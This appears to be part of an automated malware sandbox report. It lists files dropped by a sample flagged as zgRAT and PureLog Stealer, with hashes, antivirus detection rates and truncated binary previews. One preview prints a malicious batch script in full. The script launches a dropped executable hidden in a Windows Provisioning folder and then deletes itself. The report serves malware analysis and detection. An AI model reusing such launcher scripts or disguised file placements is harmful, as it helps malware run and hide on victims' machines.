                                                      Encrypted:false
                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                      Malicious:false
                                                      Preview:@...e.................................X..............@..........

                                                      C:\Users\user\AppData\Local\Temp\GargantuaN.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2289873
                                                      Entropy (8bit):7.491711964173027
                                                      Encrypted:false
                                                      SSDEEP:24576:2TbBv5rUyXVIR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTjR:IBJIUPKCeJxkBceok7WURfTj/j9wDmm4
                                                      MD5:B3CEE15E9FDDC0E7DC33069319B549D6
                                                      SHA1:1FF4EF47BA8A0DE9F65EAA389B11D662AEC318DE
                                                      SHA-256:AF6A8E7175A702F8AF26ED414DD0FBF1708F7716EFB33792594149EF12D2431C
                                                      SHA-512:CA402D334E8C7D6DC3FAB0A129C56EF8ED3228B75C7B5BC5B0E5A174B199D37583395CC52D241CAF583ABA46DF388F46E728BCC264F25312F62929AC932809D0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                      • Antivirus: Virustotal, Detection: 53%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\GargantuanS.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5475840
                                                      Entropy (8bit):6.521499958209298
                                                      Encrypted:false
                                                      SSDEEP:98304:v1ECDUbTBOrBu3mhZvUvpldnwq4b17j1EQ/AVEkteJ5ymz6vZL50Xpa:vVUgBu3sUPdob17GQfk45ymGvZt
                                                      MD5:7A568EF3F46D369F3D3FFD68FDF68573
                                                      SHA1:203042A80812E2208C45AA95900172550994D80D
                                                      SHA-256:BB895B0D8E684A48F0E9564B9D7E1323087D4F4664DA134A28A54338BFAB4EA0
                                                      SHA-512:4F08CDD7021BD9AC1922D1252DBF7A2F26C689574FDA7C5A0EAC7DDC1F1138F3A51770B23F5EA23458611851E410FAF5468A7209437E354452C47C13F2BB3ECD
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........R.....@..........@..............................T...........`.....................................................<.....S.P.....S...............S.x...............................(.......8...........X...x............................text............................... ..`.rdata...'.......(..................@..@.data....R.......R.................@....pdata........S.......S.............@..@.00cfg........S.......S.............@..@.tls..........S.......S.............@....rsrc...P.....S.......S.............@..@.reloc..x.....S.......S.............@..B........................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\Y3JYEDyczl

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):25
                                                      Entropy (8bit):4.293660689688185
                                                      Encrypted:false
                                                      SSDEEP:3:N6UWEu+0EAn:N/DuTEA
                                                      MD5:383DFC1B708DABB1113ABA4A4E02C81E
                                                      SHA1:4E1363C0CE2383964530043559CCEAEC6FD4DC18
                                                      SHA-256:CBA3C2487A99506E55707BA678F8045EDC328A215359E5EF813DAB3FAFC50ED6
                                                      SHA-512:C302F006BB94D037F1A90A60368D0F69837391CAA997438CB832F7DA4810BDFBC49BAA8375C22245D34802FD2E19451C21D210687E5A26E73173DD7F8F0874A7
                                                      Malicious:false
                                                      Preview:4041WlTFc13aoPD6aOHV1NAQe

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f54xiryt.5iz.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0wd3t4d.3q0.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnediovm.vle.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzrg2sk5.gbv.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):176
                                                      Entropy (8bit):5.247378044845812
                                                      Encrypted:false
                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVcL1bG2wOpbRnAdASBktKcKZG1t+kiE2J5xAIWPUV:hCRLuVFOOr+DEqBbOGVAdASKOZG1wknS
                                                      MD5:44ED471A88CA3E3E404EE06B3FED43F4
                                                      SHA1:BDC6A8090B3F507481B40A177B9BE34E98077927
                                                      SHA-256:891F19BF4B1FEF90065D1FB1B21502EEC493BBDE5C64492E559B49223F5E4263
                                                      SHA-512:DCBE726E189F268DD1D180A47252EC66AB8B00FE8036D9EDAB1622305150B04917B549AFBA3701197A13E416C71C556A7635824028C7F3D5C471349FB695B27B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\sB1sK52ORC.bat"

                                                      C:\Users\user\Desktop\IkSFhrpY.log

                                                      Download File
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      • Antivirus: Virustotal, Detection: 25%, Browse
                                                      Joe Sandbox View:
                                                      • Filename: hfGA6tjyxY.exe, Detection: malicious, Browse
                                                      • Filename: 3m7cmtctck.exe, Detection: malicious, Browse
                                                      • Filename: jXtV6KO1A7.exe, Detection: malicious, Browse
                                                      • Filename: fDTPlvsGfH.exe, Detection: malicious, Browse
                                                      • Filename: W4tW72sfAD.exe, Detection: malicious, Browse
                                                      • Filename: 8CDSiIApNr.exe, Detection: malicious, Browse
                                                      • Filename: 3otr19d5Oq.exe, Detection: malicious, Browse
                                                      • Filename: idYLOQOVSi.exe, Detection: malicious, Browse
                                                      • Filename: ZAF4Dsu737.exe, Detection: malicious, Browse
                                                      • Filename: mbsPX9l9Ge.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\KEMGRwnV.log

                                                      Download File
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):85504
                                                      Entropy (8bit):5.8769270258874755
                                                      Encrypted:false
                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                      • Antivirus: Virustotal, Detection: 69%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                      C:\Users\user\Desktop\LugVktua.log

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 20%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                      C:\Users\user\Desktop\WiKMUFpI.log

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):85504
                                                      Entropy (8bit):5.8769270258874755
                                                      Encrypted:false
                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                      • Antivirus: Virustotal, Detection: 69%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                      C:\Users\user\Desktop\XVmuemSr.log

                                                      Download File
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 4%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\kEwbgeKe.log

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 4%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\msAjSsFc.log

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      • Antivirus: Virustotal, Detection: 25%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\phOzxInG.log

                                                      Download File
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24064
                                                      Entropy (8bit):5.4346552043530165
                                                      Encrypted:false
                                                      SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                      MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                      SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                      SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                      SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 6%
                                                      • Antivirus: Virustotal, Detection: 11%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\vsaRQqFM.log

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24064
                                                      Entropy (8bit):5.4346552043530165
                                                      Encrypted:false
                                                      SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                      MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                      SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                      SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                      SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 6%
                                                      • Antivirus: Virustotal, Detection: 11%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\zQhPhksn.log

                                                      Download File
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69632
                                                      Entropy (8bit):5.932541123129161
                                                      Encrypted:false
                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      • Antivirus: Virustotal, Detection: 20%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                      C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*

                                                      C:\Windows\Provisioning\Packages\e3a74901549792

                                                      Download File
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (334), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):334
